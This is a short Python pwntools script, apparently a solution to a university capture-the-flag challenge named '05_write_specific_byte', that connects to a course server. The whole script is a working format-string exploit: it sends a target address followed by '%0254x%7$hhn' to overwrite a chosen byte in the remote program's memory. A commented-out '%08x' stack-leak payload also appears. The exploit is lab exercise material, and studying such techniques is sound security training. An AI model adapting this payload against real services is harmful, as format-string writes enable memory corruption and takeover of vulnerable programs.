from pwn import remote, process, p32

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25195

conn = remote(HOST, PORT)
#conn = process("05_write_specific_byte")
#input()

tgt_addr = p32(0x804c044+3)

#2 + 256 - 4(ptr) = 254
pl = tgt_addr+b"%0254x%7$hhn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)
while conn.connected():
	print(chr(conn.recv(1)[0]), end="", flush=True)